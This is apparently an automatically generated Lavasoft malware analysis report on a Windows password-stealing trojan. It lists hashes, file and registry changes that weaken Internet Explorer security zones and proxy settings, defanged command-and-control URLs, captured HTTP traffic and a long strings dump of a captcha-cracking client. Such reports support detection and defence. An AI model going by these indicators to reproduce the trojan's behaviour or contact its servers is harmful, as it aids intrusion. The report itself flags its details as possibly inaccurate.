Trojan.Generic.12934796_56ad8324dc

by malwarelabrobot on June 22nd, 2015 in Malware Descriptions.

Trojan.Generic.12934796 (B) (Emsisoft), Trojan.Generic.12934796 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 56ad8324dcba2017a30b74607de9efb2
SHA1: 931e447082103ddc7aa9f2af492c60c7ea3007ab
SHA256: 037e5c043cd6cadfbcd32267ccb4b158f5c8888604f5e357a1b8c5e6d2bd546f
SSDeep: 49152:YezLnokNCj02YWWwmX4N2hbYiPTUQmJTaR0SRFj:xLokNWhYXX4NuEml
Size: 2793472 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: ???
Created at: 2015-03-11 17:53:03
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:464

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
C:\CrackCaptchaAPI.dll (7972 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@12345ee[1].txt (201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].txt (1560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

Registry activity

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 F7 D2 09 B7 0B 6C 5D 8D 1A 61 F6 EE 77 40 B2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
9a4965011a94705227f62df0776f2ab6 c:\CrackCaptchaAPI.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 894147 897024 4.44695 931518ba5d557b321d9397dbd621b4d4
.rdata 901120 1782740 1785856 4.56341 b07eeb774082b9dc94549482a558054a
.data 2686976 382027 73728 3.62404 04601570b60158fc0ea5264cdcdaabdf
.rsrc 3072000 29616 32768 3.23833 d743aad7b46927e651369b13499d7af1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.12345ee.com/YZM/1.asp 112.124.44.208
hxxp://www.12345ee.com/a/shuoshuo.asp 112.124.44.208
hxxp://www.12345ee.com/m/test.txt 112.124.44.208
hxxp://www.12345ee.com/a/2.asp 112.124.44.208


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /m/test.txt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hXXp://VVV.12345ee.com/m/test.txt
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Date: Sun, 21 Jun 2015 13:55:50 GMT
Content-Length: 50878
Content-Type: text/plain
Content-Location: hXXp://VVV.12345ee.com/m/test.txt
Last-Modified: Sun, 21 Jun 2015 07:26:29 GMT
Accept-Ranges: bytes
ETag: "8c893c97f3abd01:1b03"
Server: IIS
X-Powered-By: WAF/2.0

<<< skipped >>>

GET /a/shuoshuo.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:55:47 GMT
Content-Length: 1
Content-Type: text/html
Server: IIS
X-Powered-By: WAF/2.0
2



GET /a/shuoshuo.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:55:48 GMT
Content-Length: 1
Content-Type: text/html
Server: IIS
X-Powered-By: WAF/2.0
2..


GET /YZM/1.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:55:31 GMT
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; path=/
Server: IIS
X-Powered-By: WAF/2.0
Set-Cookie: safedog-flow-item=8968783A30548B64CAD4B5988F474F1F; expires=Dec, 21-Jun-2015 15:59:31 GMT; domain=12345ee.com; path=/
4....


GET /a/2.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.12345ee.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCABSCTB=BEIPKGKCJJFEODKMCKDBDFLN; safedog-flow-item=8968783A30548B64CAD4B5988F474F1F


HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 21 Jun 2015 13:56:12 GMT
Content-Length: 1089
Content-Type: text/html
Server: IIS
X-Powered-By: WAF/2.0
633457001*1(QQ......)..633457001*2(QQ..........)..633457001*3(........
....)..63345700104(............)..633457001*5(..........)..63345700106
(QQ........)..63345700107(........)..63345700108(........)..6334570010
9(..........)..633457001*1(QQ......)..633457001*2(QQ........)..6334570
01*3(QQ......)..63345700114(..QQ)..633457001*5(QQ......)..63345700116(
............)..63345700117(............)..633457001*8(........)..63345
7001*9(........)..633457001*2(....@....)..633457001*3(........)..63345
700120(........)..63345700121(........)..63345700122(............)..63
345700123(QQ........)..633457001*4(QQ............)..63345700125(QQ....
........)..63345700126(........)..633457001*8(........)..633457001*7(.
.......)..63345700129(........)..63345700130(........)..633457001*1(..
QQ....)..63345700132(........)..633457001*3(..QQ....)..633457001*4(..Q
QPC)..633457001*5(QQ..........)..63345700145(QQ......)..633457001*6(QQ
....)..633457001*7(QQ......)..63345700148(............)..63345700149(.
.........)..63345700150(QQ............)..11111111111111111111111111111
111111111111..88888888888........
....


The Trojan connects to the servers at the following location(s):

%original file name%.exe_464:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
CrackCaptchaAPI.dll
wininet.dll
ole32.dll
kernel32.dll
WinINet.dll
user32.dll
shlwapi.dll
Kernel32.dll
advapi32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
Login
EnumWindows
HttpAddRequestHeadersA
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
\CrackCaptchaAPI.dll
@.reloc
9.tdj.h
hCRTkP
hCRTrS
hCRTgS
hCRTbS
CRTr
CRTg
CRTb
lFtP
tcpO
tcpOt1
tcpOtQ
tcpOtN
tcpOt.
operator
GetProcessWindowStation
Multipage Encode, Unsupported operation for this format
Page %d
Save PSD not supported
Save RAW not supported
Save WMF not supported
Unsupported WBMP type
1.5.0
compression type not supported
Portable Graymap/Pixmap (PNM)
? %s %s %d %ld %ld
error: BMP format does not support color space
tileno = %d; len = %d; partno = %d; numparts = %d
prec[%d] = %d; sgnd[%d] = %d; hsamp[%d] = %d; vsamp[%d] = %d
tilewidth = %d; tileheight = %d; tilexoff = %d; tileyoff = %d;
width = %d; height = %d; xoff = %d; yoff = %d;
caps = 0xx;
prcwidth[%d] = %d, prcheight[%d] = %d
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx;
prg = %d; numlyrs = %d;
numdlvls = %d; qmfbid = %d; mctrans = %d
csty = 0xx;
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx; qmfbid = %d;
compno = %d; csty = 0xx; numdlvls = %d;
compno = %d; roisty = %d; roishift = %d
expn[%d] = 0xx; mant[%d] = 0xx;
qntsty = %d; numguard = %d; numstepsizes = %d
compno = %d; qntsty = %d; numguard = %d; numstepsizes = %d
seqno = %d;
ind=%d; len = %d;
le[%d] = %d
rs[%d] = %d; re[%d] = %d;
cs[%d] = %d; ce[%d] = %d;
po[%d] = %d;
hoff[%d] = %d; voff[%d] = %d
regid = %d;
len = %d;
type = 0xx (%s);
Creator: JasPer Version %s
lyrno=d cmptno=d rlvlno=d bandno=d prcno=d cblkno=d passno=d
lyrno = d
success %d goodthresh %f
MbP?maxlen=ld actuallen=ld thresh=%f
min rdslope = %f max rdslope = %f
cblk ] ] ] ]
prc ] ] ] ] (] ])
band ] ] ] ]
rlvl ] ] ] ]
tcmpt ] ] ] ]
invalid code block width %d
invalid code block height %d
warning: ignoring invalid option %s
warning: invalid intermediate layer rates specifier ignored (%s)
ignoring bad rate specifier %s
ignoring invalid progression order %s
ignoring invalid mode %s
unsupported image type
error: too few guard bits (need at least %d)
CODE BLOCK %d
CODE BLOCK GROUP %d
BAND %d
xs =%d, ys = %d, xe = %d, ye = %d, w = %d, h = %d
RESOLUTION LEVEL %d
ICC Profile CS x
error: unsupported compression type
box type %s
warning: palettized images not fully supported
error: encoding method not supported
error: RLE encoding method not supported
error: unsupported color space
unsupported BMP encoding
error: unsupported BMP encoding
THE BMP FORMAT IS NOT FULLY SUPPORTED!
no palettized image support for BMP format
%s%ld
warning: support for signed sample data requires use of nonstandard extension to PNM format
data=%s
component tlx=%ld tly=%ld sampperx=%ld samppery=%ld width=%ld height=%ld prec=%d sgnd=%d
error: PNM support required
warning: ignoring unsupported options
(%f, %f, %f)
entry[%d] = %f
gamma = %f
number of entires = %d
maclen = %d
sccode = %d
uclangcode = %d; uclen = %d
ascii = "%s"
string = "%s"
numintabents=%d, numouttabents=%d
e[%d][%d]=%f
numinchans=%d, numoutchans=%d, clutlen=%d
x:
1.900.1
packet offset=ld prg=%d cmptno=d rlvlno=d prcno=d lyrno=d
coding pass failed passtype=%d segtype=%d
csid=%d
method=%d; pri=%d; approx=%d
channo=%d; type=%d; assoc=%d
cmptno=%d; map=%d; pcol=%d
numchans = %d
LUT[%d][%d]=%d
numents=%d; numchans=%d
type=%c%s%c (0xx); length=%d
%s: Out of memory in %s
?%s: decoder table overflow
%d.%d.%d
%d %d
%d,%d
%d %d %d
/.badpixels
%s is not a valid PGM file!
%s has the wrong dimensions!
Scaling with darkness %d, saturation %d, and
%s: Cannot use camera p->white balance.
Median filter pass %d...
11124811248488
012347800000005896
%d:%d:%d %d:%d:%d
@0134567028
023457000000006000
012346000000000000
.Ad530flex
%d:%d:%d
%*s %s %d %d:%d:%d %d
v%d %dx%d
A%s %s
Converting to %s colorspace...
?d:d:d d:d:d
12435867
?Unknown option "-%c".
Non-numeric argument to "-%c"
114111111422
%f %f %f
Ixpress %d-Mp
50132467
Failed to read metadata from %s
Reading metadata from %s ...
%s: You must link dcraw with libjpeg!!
%dx%d
1.2.5
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
Bogus message code %d
%ld%c
?0123456789ABCDEFlibpng warning: %s
libpng error: %s
Buffer error in compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Incomplete compressed datastream in %s chunk
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%d, gy=%d, bx=%d, by=%d
wx=%d, wy=%d, rx=%d, ry=%d
incorrect gamma=(%d/100000)
Ignoring iCCP chunk with declared size = %u and actual length = %u
NULL row buffer for row %ld, pass %d
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
%s: Must set "PlanarConfiguration" before writing data
%s: No space for %s arrays
%s: Must set "ImageWidth" before writing data
%s: File not open for writing
%s: No space for output buffer
%s: No space to expand strip arrays
%d: Sample out of range, max %d
Integer overflow in %s
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
Failed to allocate memory for %s (%ld elements of %ld bytes each)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: wrong data type %d for "%s"; tag ignored
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
%s compression support is not configured
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
%s: %s
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
Row pixels integer overflow (rowpixels %u)
%s: No space for Group 3/4 reference line
C Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
?#%X.y
Broken pipe
Inappropriate I/O control operation
Operation not permitted
\\.\Scsi%d:
\\.\PhysicalDrive%d
,./1234567
Referer:%s
Cookie: %s
CInternetFileOperator
InternetOpen(%s) failed
InternetOpenUrl(%s) failed(err=%d, header=%s)
HttpQueryInfo(%s, %d) failed(err=%d)
Request URL(%s) return %s
HttpQueryInfo(%s, ContextType) failed(err=%d)
ReadInternetFile(%s, ContextType=%s) failed
Alloc cookie memory failed(len=%d)
InternetReadFile(%d) failed(err=%d)
Alloc file memory failed(datalen=%d, retlen=%d)
FIELD_ID_NEW_PASSWORD
FIELD_ID_FILE_SERVER_PORT
FIELD_ID_MAIN_SERVER_PORT
FIELD_ID_FILE_URL
FIELD_ID_FILE_URL_LEN
FIELD_ID_KEY
FIELD_ID_PASSWORD
ip=%s
C:\work\VCodeServer\Common\include\IPacketDataWriterImpl1_0.h
Login_Req
Login_Rsp
AppReportVCodeRight_Req
AppReportVCodeRight_Rsp
[%7lu]Get packet define failed(seq=%lu, cmd=%lu)
[%7lu]Get packet define and session data failed(seq=%lu, cmd=%lu)
[%7lu]Set offset error(seq=%lu, cmd=%lu)
[%7lu]MAC error(seq=%lu, cmd=%lu)
[%7lu]Packet fixed length error(dwFixLen=%d)
[%7lu]Packet head VCC Verify error(src=%d, comp=%d, seq=%lu, cmd=%lu)
[%7lu]Command(%d) not support(seq=%lu)
[%7lu]Packet length(%d) error(seq=%lu, cmd=%lu)
[%7lu]Packet type(%d) error(seq=%lu, cmd=%lu, srcdest=%d)
[%7lu]Get Memory Failed(seq=%lu, cmd=%lu)
[%7lu]Packet ID not found(srcdest=%d, cmdID=%d)
verify code of encrypt key error
verify code of MAC key error
Field(%s) offset(%d) is greater than data length(%d)
Decrypt field(%s) failed
Offset(%d) > Len(%d) [packect=%s, field=%s]
EncryptData error [packect=%s, field=%s]
[%7lu]Packet ID not found(PacketID=%d, cmd=%lu, srcdest=%d)
[%7lu]Session ID not found(cmd=%lu, srcdest=%d, sessionid=%d)
open.baidu.com
time.nist.gov
asia.pool.ntp.org
cn.ntp.org.cn
time.dama2.com
WSASocket Failed ,code=%d
WSACreateEvent() Failed , code=%d
Connect fail(err=%d, server=%s, port=%d, socket=%d, time=%d)
Connect server(%s:%d) success(socket=%d)
Connect server(%s:%d) failed(socket=%d, time=%d)
Connect server(%s:%d) success(socket=%d): connect return: %d
send fail(err=%d, socket=%d)
Receive fail(err=%d, socket=%d)
WSAEventSelect() Failed ,code=%d
WSAEnumNetworkEvents(%d,%d) Failed ,code=%d
events.lNetworkEvents(%d) & %d != 0 (socket=%d, err=%d)
events.lNetworkEvents & FD_CLOSE != 0 (socket=%d, err=%d)
WSAEnumNetworkEvents(%d,%d) exception ,ret=%d, lNetworkEvents=%d, LastError=%d
Synchronize time success by %s:%d
GET /special/time/ HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: open.baidu.com
window.baidu_time(
HTTP/
Exit %s(used %dms)
%u.%u.%u.%u
RespCode=%d(seq=%lu)
user name is empty(seq=%lu, cmd=%lu)
CrackCaptchaClient.ini
%s\%s
Software ID error(%s)
Enter %s
InnerLogin
%s login(softname=%s)
byRespCode=%d
%s logoff(softname=%s)
RegisterUser(%s) success
ReadUserInfo(%s) success
start decode: url=%s, len=%d, timeout=%d, type=%d
Internet add task failed(ProcessID=%u)
start decode: datalen=%d, ext=%s, len=%d, timeout=%d, type=%d
start GetResult: processID=%u, uTimeout=%u
GetResult Error: processID=%u
GetResult Success: processID=%u, VCode=%s, id=%u
vcode buffer len(%d) < vcode len(%d)
GetDecodeResult success(uProcessID=%d, vcodeid=%lu, VCode=%s)
ReportDecodeCorrectness success(vcodeid=%lu)
QueryUserBalance success(user=%s, balance=%d)
Recharge success(user=%s, cardno=%s)
FetchVCodeImage success(processid=%d)
ProcessID(%d) not in WorkerFetchResult
GetFetchVCodeImageResult finish(processid=%d, uVCodeID=%lu, err=%d, RespCode=%d)
RefreshVCode Reader empty(processid=%d)
RefreshVCode: Cookie is empty(processid=%d)
RefreshVCode no data(processid=%d)
RefreshVCode no data(processid=%d, file is downloading)
RollbackVCode success(count=%d)
stat buffer len(%d) <= stat info len(%d)
QueryStatistics success(stat=%s)
Get Memory Failed, BlockCount=%d
[%d]connected to server(ip=%s, port=%d)
[%d]Unpack error(seq=%lu, cmd=%lu)
